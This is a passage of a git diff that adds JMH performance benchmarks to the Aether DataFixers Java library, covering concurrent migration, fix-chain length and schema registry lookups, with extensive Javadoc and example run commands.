Provides a fixed-thread baseline for comparing against variable-thread + * benchmarks. Four threads represent a typical server core count and help + * establish scaling characteristics between single-threaded and maximum + * parallelism scenarios.

+ * + *

Use this benchmark to:

+ *
    + *
  • Establish baseline concurrent performance on quad-core systems
  • + *
  • Compare with {@link #eightThreadMigration} to measure scaling factor
  • + *
  • Identify the point where adding threads provides diminishing returns
  • + *
+ * + * @param s shared benchmark state containing the DataFixer + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(4) + public void fourThreadMigration(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks migration performance with exactly 8 concurrent threads. + * + *

Tests scaling beyond the 4-thread baseline. Eight threads represent + * a common server configuration and help identify whether the DataFixer + * implementation scales efficiently with additional parallelism.

+ * + *

Scaling analysis:

+ *
    + *
  • 2x throughput vs 4 threads: Perfect linear scaling
  • + *
  • 1.5-2x throughput: Good scaling with minor contention
  • + *
  • <1.5x throughput: Contention limiting scalability
  • + *
  • ≤1x throughput: Severe contention; investigate locking
  • + *
+ * + * @param s shared benchmark state containing the DataFixer + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(8) + public void eightThreadMigration(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.toVersion + ); + blackhole.consume(result); + } + + // ==================== Concurrent Registry Access Benchmarks ==================== + + /** + * Benchmarks concurrent random schema lookups from the registry. + * + *

All available threads perform random version lookups against a shared + * {@link SchemaRegistry} containing 100 schema versions. This benchmark + * validates the thread-safety and performance of registry read operations + * under heavy concurrent access.

+ * + *

The benchmark uses pre-computed random indices (via {@link ThreadState#nextRegistryIndex()}) + * to avoid RNG contention affecting measurements. Each thread cycles through + * a 1024-element buffer of random indices.

+ * + *

Performance expectations:

+ *
    + *
  • Registry lookups should be lock-free and scale linearly
  • + *
  • Cache effects may cause variance based on version access patterns
  • + *
  • No write contention since registry is frozen before benchmarking
  • + *
+ * + * @param s shared benchmark state containing the registry and versions + * @param t per-thread state providing random index sequence + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentRegistryLookup(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final int index = t.nextRegistryIndex(); + final Schema schema = s.sharedRegistry.get(s.registryVersions[index]); + blackhole.consume(schema); + } + + /** + * Benchmarks concurrent latest-schema lookups from the registry. + * + *

All available threads repeatedly call {@link SchemaRegistry#latest()} + * on a shared registry. This represents the "hot path" optimization where + * applications frequently need the most recent schema version.

+ * + *

This benchmark helps validate:

+ *
    + *
  • Caching effectiveness for the latest schema reference
  • + *
  • Memory visibility of the cached latest schema across threads
  • + *
  • Absence of unnecessary synchronization on read-only access
  • + *
+ * + *

Expected to outperform {@link #concurrentRegistryLookup} due to:

+ *
    + *
  • No version-to-schema map lookup required
  • + *
  • Single cached reference rather than computed lookup
  • + *
  • Better CPU cache utilization from accessing same memory location
  • + *
+ * + * @param s shared benchmark state containing the registry + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentLatestLookup(final BenchmarkState s, + final Blackhole blackhole) { + final Schema schema = s.sharedRegistry.latest(); + blackhole.consume(schema); + } + + // ==================== State Classes ==================== + + /** + * Shared benchmark state accessible by all threads. + * + *

This state class contains all resources that are shared across benchmark + * threads, simulating real-world scenarios where a single DataFixer instance + * serves multiple concurrent requests.

+ * + *

State initialization occurs once per trial (before warmup begins) to + * ensure consistent starting conditions across all measurement iterations.

+ * + *

Shared Resources

+ *
    + *
  • {@link #sharedFixer} - Single-fix DataFixer for basic migration benchmarks
  • + *
  • {@link #sharedChainFixer} - 10-fix chain DataFixer for chain migration benchmarks
  • + *
  • {@link #sharedRegistry} - Frozen SchemaRegistry with 100 versions for lookup benchmarks
  • + *
  • Version constants - Pre-computed DataVersion instances to avoid allocation during measurement
  • + *
+ */ + @State(Scope.Benchmark) + public static class BenchmarkState { + + /** + * The payload size parameter, injected by JMH. + * + *

Controls the complexity of generated test data for each thread. + * Only SMALL and MEDIUM sizes are used to balance benchmark runtime + * with meaningful performance differentiation.

+ * + * @see PayloadSize + */ + @Param({"SMALL", "MEDIUM"}) + public PayloadSize payloadSize; + + /** + * Shared DataFixer configured with a single fix (v1 → v2). + * + *

Used by migration benchmarks that measure basic concurrent + * fix application without chain traversal overhead.

+ */ + public DataFixer sharedFixer; + + /** + * Shared DataFixer configured with a 10-fix chain (v1 → v11). + * + *

Used by {@link #concurrentChainMigration} to measure concurrent + * performance when applying multiple sequential fixes.

+ */ + public DataFixer sharedChainFixer; + + /** + * Shared SchemaRegistry containing 100 schema versions. + * + *

The registry is frozen after population to ensure thread-safe + * read access during benchmarks. Versions range from 10 to 1000 + * in increments of 10.

+ */ + public SchemaRegistry sharedRegistry; + + /** + * Source version for all migrations (v1). + */ + public DataVersion fromVersion; + + /** + * Target version for single-fix migrations (v2). + */ + public DataVersion toVersion; + + /** + * Target version for chain migrations (v11). + */ + public DataVersion chainToVersion; + + /** + * Pre-computed DataVersion array for registry lookup benchmarks. + * + *

Contains 100 versions (10, 20, 30, ..., 1000) matching the + * schemas registered in {@link #sharedRegistry}. Pre-allocation + * avoids DataVersion object creation during measurement.

+ */ + public DataVersion[] registryVersions; + + /** + * Initializes all shared benchmark state. + * + *

Creates DataFixer instances, populates the SchemaRegistry with + * 100 versions, and pre-computes all version constants. The registry + * is frozen after population to enable lock-free concurrent reads.

+ */ + @Setup(Level.Trial) + public void setup() { + this.sharedFixer = BenchmarkBootstrap.createSingleFixFixer(); + this.sharedChainFixer = BenchmarkBootstrap.createChainFixer(10); + + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(2); + this.chainToVersion = new DataVersion(11); + + final SimpleSchemaRegistry registry = new SimpleSchemaRegistry(); + this.registryVersions = new DataVersion[100]; + for (int i = 0; i < 100; i++) { + final int version = (i + 1) * 10; + this.registryVersions[i] = new DataVersion(version); + registry.register(MockSchemas.minimal(version)); + } + registry.freeze(); + this.sharedRegistry = registry; + } + } + + /** + * Per-thread benchmark state for isolated data and random access patterns. + * + *

This state class provides each benchmark thread with its own input data + * and random number generator to eliminate false sharing and contention on + * thread-local operations.

+ * + *

Design Rationale

+ *
    + *
  • Thread-local input: Each thread operates on its own Dynamic instance, + * preventing write contention and ensuring independent GC behavior
  • + *
  • SplittableRandom: Faster and contention-free compared to + * {@link java.util.Random} which uses atomic CAS operations
  • + *
  • Pre-computed indices: Random registry indices are generated during + * setup to avoid RNG overhead during measurement
  • + *
+ * + *

Index Buffer Strategy

+ *

The {@link #registryIndexBuffer} uses a power-of-two size (1024) with + * bitwise AND masking for efficient wraparound without modulo operations. + * This provides pseudo-random access patterns while minimizing measurement + * overhead.

+ */ + @State(Scope.Thread) + public static class ThreadState { + + /** + * Size of the pre-computed random index buffer. + * + *

Power of two (1024) enables efficient wraparound via bitwise AND. + * Large enough to avoid pattern repetition affecting cache behavior + * during typical measurement windows.

+ */ + private static final int INDEX_BUFFER_SIZE = 1024; + + /** + * Bitmask for efficient modulo operation on buffer index. + * + *

Used as {@code cursor & INDEX_MASK} instead of {@code cursor % INDEX_BUFFER_SIZE} + * for faster wraparound calculation.

+ */ + private static final int INDEX_MASK = INDEX_BUFFER_SIZE - 1; + + /** + * Pre-computed random indices for registry lookup benchmarks. + * + *

Populated during iteration setup with random values in range + * [0, registryVersions.length). Accessed via {@link #nextRegistryIndex()}.

+ */ + private final int[] registryIndexBuffer = new int[INDEX_BUFFER_SIZE]; + + /** + * Per-thread input data for migration benchmarks. + * + *

Regenerated at each iteration to ensure consistent memory allocation + * patterns and prevent cross-iteration caching effects.

+ */ + public Dynamic threadInput; + + /** + * Current position in the {@link #registryIndexBuffer}. + * + *

Incremented on each call to {@link #nextRegistryIndex()} and + * wrapped using {@link #INDEX_MASK}.

+ */ + private int registryCursor; + + /** + * Per-thread random number generator. + * + *

{@link SplittableRandom} is used instead of {@link java.util.Random} + * because it is faster and does not use atomic operations, eliminating + * contention when multiple threads generate random numbers.

+ */ + private SplittableRandom random; + + /** + * Initializes the per-thread random number generator. + * + *

Called once per trial. Uses a fixed seed (42) for reproducibility + * across benchmark runs, though each thread will produce different + * sequences due to {@link SplittableRandom}'s splittable nature.

+ */ + @Setup(Level.Trial) + public void setupTrial() { + // Per-thread RNG avoids contention and is faster than java.util.Random. + this.random = new SplittableRandom(42L); + } + + /** + * Regenerates input data and random indices for each iteration. + * + *

Fresh data generation per iteration ensures:

+ *
    + *
  • Consistent GC pressure across iterations
  • + *
  • No JIT over-optimization on specific data patterns
  • + *
  • Independent memory allocation per thread
  • + *
+ * + *

The random index buffer is refilled with new random values to + * vary the registry access pattern across iterations.

+ * + * @param s the shared benchmark state providing payload size and version array + */ + @Setup(Level.Iteration) + public void setupIteration(final BenchmarkState s) { + this.threadInput = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, s.payloadSize); + + for (int i = 0; i < INDEX_BUFFER_SIZE; i++) { + this.registryIndexBuffer[i] = this.random.nextInt(s.registryVersions.length); + } + this.registryCursor = 0; + } + + /** + * Returns the next pre-computed random index for registry lookups. + * + *

Retrieves the next value from {@link #registryIndexBuffer} and + * advances the cursor with efficient bitwise wraparound. This method + * is called during measurement and is optimized to minimize overhead.

+ * + * @return a random index in range [0, registryVersions.length) + */ + public int nextRegistryIndex() { + return this.registryIndexBuffer[this.registryCursor++ & INDEX_MASK]; + } + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java new file mode 100644 index 0000000..9b374ee --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/package-info.java @@ -0,0 +1,130 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Concurrency-focused JMH benchmarks for the Aether DataFixers framework. + * + *

This package contains benchmarks that measure performance characteristics under + * concurrent load. These benchmarks validate thread-safety of the DataFixer system, + * identify contention points, and quantify scalability across different thread counts.

+ * + *

Benchmark Classes

+ * + * + * + * + * + * + * + * + * + * + * + *
ClassFocus AreaKey Metrics
{@link de.splatgames.aether.datafixers.benchmarks.concurrent.ConcurrentMigrationBenchmark}Multi-threaded migration and registry accessThroughput scaling, contention overhead, thread-safety validation
+ * + *

Why Concurrent Benchmarks?

+ *

Single-threaded benchmarks measure raw operation performance, but real-world + * applications often use the DataFixer system from multiple threads simultaneously. + * Concurrent benchmarks reveal:

+ *
    + *
  • Lock contention: Synchronization overhead in shared components
  • + *
  • Cache coherency effects: Performance impact of shared data access
  • + *
  • Scalability limits: Point at which adding threads stops improving throughput
  • + *
  • Thread-safety validation: Correctness under concurrent access
  • + *
+ * + *

Running Concurrent Benchmarks

+ *
{@code
+ * # Run all concurrent benchmarks with maximum threads
+ * java -jar benchmarks.jar ".*concurrent.*"
+ *
+ * # Run with specific thread count
+ * java -jar benchmarks.jar ".*concurrent.*" -t 8
+ *
+ * # Quick validation with reduced iterations
+ * java -jar benchmarks.jar ".*concurrent.*" -wi 1 -i 1 -f 1
+ *
+ * # Generate detailed JSON report
+ * java -jar benchmarks.jar ".*concurrent.*" -rf json -rff concurrent_results.json
+ *
+ * # Profile lock contention with JFR
+ * java -jar benchmarks.jar ".*concurrent.*" -prof jfr
+ * }
+ * + *

Benchmark Design Principles

+ *
    + *
  • State Isolation: Per-thread state ({@code Scope.Thread}) for input data + * prevents false sharing and measurement interference
  • + *
  • Shared Resources: Benchmark-scoped state ({@code Scope.Benchmark}) for + * DataFixer instances simulates realistic concurrent access patterns
  • + *
  • Contention-Free Setup: Random number generation and data preparation + * occur during setup phases to avoid affecting measurements
  • + *
  • Fixed Thread Counts: Benchmarks with 4 and 8 threads provide + * reproducible scaling data points for comparison
  • + *
+ * + *

Interpreting Concurrent Results

+ *

Concurrent benchmark results require careful interpretation:

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
PatternMeaningAction
Linear throughput scalingNo contention; excellent parallelismNone needed
Sub-linear scalingSome contention; typical for shared resourcesAcceptable; monitor for degradation
Throughput plateauSaturation point reachedIdentify bottleneck (CPU, memory, locks)
Throughput degradationSevere contention; adding threads hurtsInvestigate locking; consider lock-free alternatives
High variance (± error)GC pauses, lock contention, or schedulingProfile with async-profiler or JFR
+ * + *

Comparison with Core Benchmarks

+ *

The {@link de.splatgames.aether.datafixers.benchmarks.core core} package + * measures single-threaded baseline performance. Use concurrent benchmarks to:

+ *
    + *
  • Calculate concurrency overhead: {@code (single-threaded throughput × N threads) / actual throughput}
  • + *
  • Identify scaling efficiency: {@code actual throughput / (single-threaded throughput × N threads)}
  • + *
  • Detect regression: Compare concurrent results across code changes
  • + *
+ * + * @see de.splatgames.aether.datafixers.benchmarks.concurrent.ConcurrentMigrationBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.core + * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.concurrent; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java new file mode 100644 index 0000000..2b3e535 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java @@ -0,0 +1,307 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.core; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for chained DataFix application performance. + * + *

Measures how fix chain length affects migration performance. This benchmark + * is essential for understanding the scalability characteristics of the DataFixer + * system when applying multiple sequential fixes.

+ * + *

Benchmark Methods

+ *
    + *
  • {@link #renameChain} - Chain of homogeneous field rename operations
  • + *
  • {@link #mixedChain} - Chain of heterogeneous operations (renames, additions, transformations)
  • + *
  • {@link #partialChain} - Partial chain execution stopping at halfway version
  • + *
+ * + *

Parameters

+ * + * + * + * + *
ParameterValuesDescription
fixCount1, 5, 10, 25, 50Number of fixes in the chain
payloadSizeSMALL, MEDIUMInput data complexity
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2 (for statistical significance)
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

Interpreting Results

+ *
    + *
  • Linear scaling: Ideal behavior where time scales proportionally with fix count.
  • + *
  • Sub-linear scaling: Better than expected, indicates optimization opportunities being exploited.
  • + *
  • Super-linear scaling: Indicates potential performance issues with long chains.
  • + *
  • Error (±): 99.9% confidence interval. Larger values with more fixes may indicate GC pressure.
  • + *
+ * + *

Usage

+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar MultiFixChainBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar MultiFixChainBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific fix count and payload size
+ * java -jar benchmarks.jar MultiFixChainBenchmark -p fixCount=10 -p payloadSize=SMALL
+ *
+ * # Generate CSV output for analysis
+ * java -jar benchmarks.jar MultiFixChainBenchmark -rf csv -rff chain_results.csv
+ * }
+ * + * @author Erik Pförtner + * @see SingleFixBenchmark + * @see BenchmarkBootstrap#createChainFixer(int) + * @see BenchmarkBootstrap#createMixedFixer(int) + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class MultiFixChainBenchmark { + + /** + * The number of fixes in the chain, injected by JMH. + * + *

This parameter controls the length of the fix chain being benchmarked. + * Higher values test the system's ability to handle long migration paths + * efficiently.

+ * + *
    + *
  • 1: Baseline single-fix performance (compare with {@link SingleFixBenchmark})
  • + *
  • 5: Short chain typical of minor version updates
  • + *
  • 10: Medium chain representing moderate version gaps
  • + *
  • 25: Long chain simulating significant version jumps
  • + *
  • 50: Stress test for extended migration paths
  • + *
+ */ + @Param({"1", "5", "10", "25", "50"}) + private int fixCount; + + /** + * The payload size parameter, injected by JMH. + * + *

Controls the complexity of generated test data. Only SMALL and MEDIUM + * sizes are used to keep benchmark runtime reasonable while still capturing + * scaling behavior.

+ * + * @see PayloadSize + */ + @Param({"SMALL", "MEDIUM"}) + private PayloadSize payloadSize; + + /** + * DataFixer configured with a chain of homogeneous field rename fixes. + * + *

Each fix in the chain performs a simple field rename operation (v{@code n} → v{@code n+1}). + * This represents the best-case scenario for chain execution.

+ */ + private DataFixer chainFixer; + + /** + * DataFixer configured with a chain of heterogeneous fix operations. + * + *

The chain includes a mix of rename, add, and transform operations to + * simulate realistic migration scenarios. Falls back to {@link #chainFixer} + * if mixed fixer creation fails.

+ */ + private DataFixer mixedFixer; + + /** + * Pre-generated input data matching {@link #payloadSize}. + * + *

Regenerated at each iteration to ensure consistent GC behavior + * and avoid caching effects.

+ */ + private Dynamic input; + + /** + * Source version for migrations (always v1). + */ + private DataVersion fromVersion; + + /** + * Target version for full chain migrations (v{@link #fixCount} + 1). + */ + private DataVersion toVersion; + + /** + * Target version for partial chain migrations (approximately half of {@link #toVersion}). + * + *

Used by {@link #partialChain} to measure performance when only part + * of the available fixes are applied.

+ */ + private DataVersion halfwayToVersion; + + /** + * Initializes the benchmark state once per trial. + * + *

Creates the chain and mixed fixers based on the current {@link #fixCount} + * parameter. Also calculates the version bounds for full and partial chain + * execution.

+ * + *

If mixed fixer creation fails (e.g., due to unsupported operations), + * the chain fixer is used as a fallback to ensure the benchmark can still run.

+ */ + @Setup(Level.Trial) + public void setupTrial() { + this.chainFixer = BenchmarkBootstrap.createChainFixer(this.fixCount); + + try { + this.mixedFixer = BenchmarkBootstrap.createMixedFixer(this.fixCount); + } catch (final RuntimeException ex) { + this.mixedFixer = this.chainFixer; + } + + this.fromVersion = new DataVersion(1); + this.toVersion = new DataVersion(this.fixCount + 1); + + final int halfwayVersion = Math.max(2, (this.fixCount / 2) + 1); + this.halfwayToVersion = new DataVersion(halfwayVersion); + } + + /** + * Regenerates input data at each iteration. + * + *

Fresh data generation per iteration ensures that:

+ *
    + *
  • GC behavior is consistent across iterations
  • + *
  • JIT optimizations don't over-specialize on specific data patterns
  • + *
  • Memory allocation patterns are representative of real usage
  • + *
+ */ + @Setup(Level.Iteration) + public void setupIteration() { + this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize); + } + + /** + * Benchmarks a chain of homogeneous field rename operations. + * + *

Measures the performance of applying {@link #fixCount} sequential rename + * fixes to migrate data from v1 to v{@code fixCount+1}. This represents an + * optimistic scenario where all fixes perform the same lightweight operation.

+ * + *

Use this benchmark to establish baseline chain performance and detect + * any non-linear scaling behavior in the fix application pipeline.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void renameChain(final Blackhole blackhole) { + final Dynamic result = this.chainFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.input, + this.fromVersion, + this.toVersion); + blackhole.consume(result); + } + + /** + * Benchmarks a chain of heterogeneous fix operations. + * + *

Measures the performance of applying {@link #fixCount} sequential fixes + * that include a mix of operations:

+ *
    + *
  • Field renames
  • + *
  • Field additions with default values
  • + *
  • Field transformations (type conversions, value mappings)
  • + *
+ * + *

This benchmark provides a more realistic performance profile compared + * to {@link #renameChain}, as real-world migrations typically involve + * diverse operations.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void mixedChain(final Blackhole blackhole) { + final Dynamic result = this.mixedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.input, + this.fromVersion, + this.toVersion); + blackhole.consume(result); + } + + /** + * Benchmarks partial chain execution stopping at halfway version. + * + *

Measures the performance of applying only half of the available fixes + * in the chain. This simulates scenarios where:

+ *
    + *
  • Data is migrated incrementally rather than to the latest version
  • + *
  • Target version is not the most recent available
  • + *
  • Partial upgrades are performed for compatibility reasons
  • + *
+ * + *

Comparing this benchmark with {@link #renameChain} reveals whether + * fix selection and version range calculations add significant overhead.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void partialChain(final Blackhole blackhole) { + final Dynamic result = this.chainFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + this.input, + this.fromVersion, + this.halfwayToVersion + ); + blackhole.consume(result); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java new file mode 100644 index 0000000..0b72395 --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java @@ -0,0 +1,384 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.core; + +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.schema.Schema; +import de.splatgames.aether.datafixers.api.schema.SchemaRegistry; +import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry; +import de.splatgames.aether.datafixers.testkit.factory.MockSchemas; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.SplittableRandom; +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for schema registry lookup performance. + * + *

Measures the overhead of various schema lookup operations as registry size grows. + * Schema lookups are performed frequently during data migration, so their performance directly impacts overall + * migration throughput.

+ * + *

Benchmark Methods

+ *
    + *
  • {@link #exactLookup} - Direct lookup by exact version match
  • + *
  • {@link #floorLookup} - Floor lookup finding closest version ≤ target
  • + *
  • {@link #latestLookup} - Retrieval of the most recent schema
  • + *
  • {@link #sequentialLookup} - Sequential traversal of all registered versions
  • + *
+ * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
schemaCount10, 50, 100, 500Number of schemas in the registry
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2 (for statistical significance)
JVM Heap2 GB min/max
Time UnitNanoseconds
+ * + *

Interpreting Results

+ *
    + *
  • O(1) lookups: {@link #exactLookup} and {@link #latestLookup} should show constant time regardless of registry size.
  • + *
  • O(log n) lookups: {@link #floorLookup} may show logarithmic scaling if implemented via binary search.
  • + *
  • O(n) lookups: {@link #sequentialLookup} should scale linearly with schema count.
  • + *
  • Cache effects: Larger registries may show increased lookup time due to CPU cache pressure.
  • + *
+ * + *

Usage

+ *
{@code
+ * # Run only this benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark
+ *
+ * # Quick test with reduced iterations
+ * java -jar benchmarks.jar SchemaLookupBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Specific schema count only
+ * java -jar benchmarks.jar SchemaLookupBenchmark -p schemaCount=100
+ *
+ * # Run specific lookup benchmark
+ * java -jar benchmarks.jar SchemaLookupBenchmark.exactLookup
+ * }
+ * + * @author Erik Pförtner + * @see SchemaRegistry + * @see SimpleSchemaRegistry + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.NANOSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class SchemaLookupBenchmark { + + /** + * Benchmarks exact version lookup performance. + * + *

Measures the time to retrieve a schema by its exact registered version. + * This is the most common lookup pattern during migration when the source version is known precisely.

+ * + *

The benchmark uses pre-generated random indices to avoid RNG overhead + * in the measurement loop. Each invocation looks up a different random version to prevent branch prediction + * optimization.

+ * + * @param s the shared benchmark state containing the registry and versions + * @param t the per-thread state providing random lookup indices + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void exactLookup(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final int index = t.nextExactIndex(); + final Schema schema = s.registry.get(s.versions[index]); + blackhole.consume(schema); + } + + /** + * Benchmarks floor lookup performance. + * + *

